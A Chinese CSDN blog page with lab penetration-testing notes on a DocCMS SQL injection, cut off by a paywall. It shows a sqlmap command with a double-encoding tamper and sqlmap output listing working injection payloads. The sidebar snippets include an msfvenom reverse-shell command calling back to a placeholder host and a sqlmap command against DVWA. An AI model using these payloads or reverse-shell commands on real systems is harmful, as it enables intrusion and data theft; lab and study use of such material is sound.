2021-11-6完整linux内网渗透实战笔记(域/非域对于linux其实区别不大+宝塔后台渗透+稻壳DocCMSsql注入+交互式shell用python解决乱码问题)

已于 2022-04-30 14:28:32 修改
阅读量7.1k 收藏 1
点赞数 1
分类专栏: 各种靶场 文章标签: linux sql 安全
于 2021-11-14 20:32:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45290991/article/details/121197056
版权

   

欢迎大家一起来Hacking水友攻防实验室学习,渗透测试,代码审计,免杀逆向,实战分享,靶场靶机,求关注

  启明yyds,我第一次觉得自己选对了公司,hvv估计有望了

外网打点发现web服务器有:

DocCMS的sql需要url双重编码绕过,所以sqlmap要tamper:

sqlmap.py -u "http://网站ip/search/?keyword=123" --tamper=chardoubleencode

代码审计之_doccms2016漏洞_whojoe的博客-CSDN博客

代码审计之DocCms漏洞分析-阿里云开发者社区

 得到:current user: 'www_ddd4_com@localhost'

sqlmap identified the following injection point(s) with a total of 112 HTTP(s) requests:
---
Parameter: keyword (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: keyword=-2578' OR 4517=4517#

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: keyword=123' AND GTID_SUBSET(CONCAT(0x716a7a7671,(SELECT (ELT(8175=8175,1))),0x7178717871),8175)-- sYQN

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: keyword=123' AND (SELECT 2008 FROM (SELECT(SLEEP(5)))ohfb)-- tUnc

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: keyword=123' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a7a7671,0x5046774c4d75506444637a6f7a775852614f7751464566447363797445616a637465534857746b6d,0x7178717871),NULL,NULL,NULL,NULL#
---
[21:04:52] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[21:04:52] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.6
[21:04:53] [INFO] fetching current user
current user: 'www_ddd4_com@localhost'
[21:04:53] [INFO] fetched data logged to te

最低0.47元/天 解锁文章
热热的雨夜
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
GOST端口转发
惰立的博客
05-06 1062
GOST端口转发
fatal: 无法访问 ‘网址‘:GnuTLS recv error (-54): 在 pull 函数中出错。
qq_67667368的博客
05-01 4185
git clone https://github.com/sqlmapproject/sqlmap git clone命令时出现fatal: 无法访问 '网址':GnuTLS recv error (-54): 在 pull 函数中出错。命令 cd /usr/share进入share文件,ls查看当前文件夹是否有sqlmap(10行14列)搜索网上得知将https改为git即可,但是我还是么有成功,然后我又在此基础上在网址后面加上l '.git'结果还是报错,如图。
渗透实战内网渗透_内网渗透实例
最新发布
2401_84578953的博客
05-23 812
本文记录了一次针对具有二层内网环境进行渗透测试的过程,文中涉及了内网渗透的基本方法、思路和技巧。交替使用了msf、CobaltStrike、frp、chisel、SharpSQLTools等工具,最后通过约束委派拿下了控。其间运用了很多小工具,文章较长,下面开始此次渗透长途之旅。
web渗透测试实战-SQLMAP
c_lanxiaofang的博客
05-26 8225
一、实验项目名称 web渗透测试实战-SQLMAP 二、实验目的及要求 熟悉SQL注入漏洞原理 熟悉SQLMAP工具使用。 1、获取数据库信息:数据库漏洞、数据库名、数据库版本等 python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51"
doccms2016漏洞
qq_52671379的博客
04-12 1246
doccms2016sql注入漏洞
代码审计之DocCms漏洞分析
04-05 1795
0x01 前言 DocCms[音译:稻壳Cms] ,定位于为企业、站长、开发者、网络公司、VI策划设计公司、SEO推广营销公司、网站初学者等用户 量身打造的一款全新企业建站、内容管理系统,服务于企业品牌信息化建设,也适应用个人、门户网站建设! 0x02 环境搭建 DocCms官网:http://www.doccms.com 程序源码:DocCms2016 下载地址:https:...
宝塔linux面板漏洞static,宝塔面板编译Nginx secure_link模块
weixin_33745006的博客
05-16 340
之前有个功能需要nginx的secure_link模块,无奈宝塔默认编译的Nginx不带这个模块,所以就需要手动编译并替换。目前宝塔面板提供的最新Nginx是1.12.2,和官方稳定版一样。记录一下编译过程说明宝塔在默认编译nginx后,会保留源码,及必要的模块源码(如ngx_cache_purge),所以编译时无需再次下载默认安装脚本:/www/server/panel/install/ngin...
凹凸棒土-稻壳活性炭复合滤料与陶粒滤料对水中亚甲基蓝的吸附性能研究
06-04
用以凹凸棒土为主要原料制备的凹凸棒土-稻壳活性炭复合滤料和陶粒滤料分别对亚甲基蓝进行吸附实验。研究了温度、pH值、吸附时间和2种滤料投加量对亚甲基蓝吸附性的影响,并对2种不同滤料的吸附性能进行比较。实验数据...
稻壳与褐煤共热解过程的TG-FTIR分析
05-27
利用TG-FTIR技术对稻壳与褐煤按照不同比例进行的共热解过程进行分析.结果发现,共热解过程的热失重相对于单独热解有所加深,尤其是在稻壳与褐煤按照2∶8比例进行共热解时;共热解过程的热解产物发生变化,其中CO2产物...
ISO 13061-1-2014+AMD1-2017中文.pdf
05-30
ISO 13061-1-2014+AMD1-2017中文.pdf知识点解读 ISO 13061-1-2014+AMD1-2017中文.pdf是国际标准化组织(ISO)发布的一份技术标准文件,发布于2014年,后于2017年进行了修订和补充。该标准主要对金属材料的检测和...
ISO_IEC_IEEE29119-4-2015(4_Test techniques).xdf
09-16
ISO/IEC/IEEE 29119-4:2015 defines test design techniques that can be used during the test design and implementation process that is defined in ISO/IEC/IEEE 29119‑2. 稻壳阅读器打开
Q/GDW-10-314-200720kV隔离开关技术规范.xdf
04-28
本标准是根据江苏省电力公司推广应用20kV电压等级中压配电网的需要而编制。 由于现行国标、 行标和企业标准等一般未涉及20kV电压...忘了转换格式了,下载一个稻壳阅读器打印成PDF格式就可以用正常PDF软件打开使用了。
代码审计之_doccms2016漏洞
whojoe的博客
04-12 1509
doccms2016代码审计及漏洞复现doccms2016代码审计及漏洞复现1.sql注入2.后台getshell3.留言处存储xss4.后台任意文件下载5.总结 doccms2016代码审计及漏洞复现 1.sql注入 在/content/search/index.php中,首先对参数keyword进行非法字符检测 <?php //首页搜索,站内关键字搜索 function index() ...
宝塔linux面板漏洞工具,宝塔面板Linux 7.4.2版本被传严重漏洞 Bug隐患
weixin_33668998的博客
05-07 814
上周日宝塔面板被传出严重的漏洞,数据库未授权访问漏洞,公网无需鉴权直接 root 权限进入 phpmyadmin,导致很多网站数据库被篡改或者直接清理了数据库,可谓损失惨重!当日晚间,大多用户均收到宝塔面板官方发布紧急安全更新的短信通知:“Linux面板7.4. 2 版本/Windows面板6. 8 版本存在安全隐患,官方已发布紧急更新,请所有使用此版本的用户务必升级到最新版,更新方法,登录面板直...
项目五linux 内网完整渗透测试实例笔记
qq_56426046的博客
01-29 1728
本靶场存在三个 flag 把下载到的虚拟机环境导入到虚拟机,本靶场需要把网络环境配置好。在 wdcp 生成秘钥保存下来 在 kali 设置权限 600你知道什么叫幸福嘛?幸福就是拍拍手。
网络靶场实战-记一次大型内网渗透实践 【完结篇】
蛇矛实验室
12-13 1239
本场景基于某业务架构进行搭建,场景内包含了100余台主机以及20余子网,内置相关应用,包括Web服务、邮件服务、文件服务、OA服务等,但本场景多通过水坑攻击、钓鱼攻击、服务爆破等相关技术,其中包含了Chrome漏洞利用、Office漏洞利用等。通过本场景可以进行相关攻防技术训练。
内网渗透Linux上线
剁椒鱼头没剁椒的博客
06-12 3215
默认情况下CS是不支持上线Linux的,只支持上线Windows,但是再事情的渗透测试过程中,一般企业重用的业务通常都是运行再Linux上的,这就会导致原版的CS无法上线Linux,而这时候可以使用crossC2插件来解决这个问题
Kali Linux渗透测试——信息收集
Captain_RB的博客
02-09 3827
详细介绍渗透测试中信息搜集的基本思路和常用方法,包括主动信息搜集和被动信息搜集两个方面
MSF内网渗透实战
hackzkaq的博客
05-17 3814
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全-小熊保安 本来还是想用cobalt strike,但是由于某些原因,暂时关闭了cobalt strike的服务器,正好用msf尝试做一次内网渗透熟悉熟悉,注:最初用蚁剑看了一下,此次目标主机没开杀软,所以以下内容不涉及免杀. 一、MSF生成木马上线目标 1. 生成木马 使用命令: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=XXX.XXX.XXX.XX LPORT=4444 -f ex
"年会盛况-稻壳儿公司20XX年黑金大气PPT模板
经营利润达到了666.6万元,较去年增长了188.8万元,展示出公司的持续稳步发展。 在领导的致辞中,回顾了过去一年的点滴精彩和努力付出。全体员工的勤奋工作和辛勤付出为公司的发展留下了浓墨重彩的一笔,值得赞赏和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值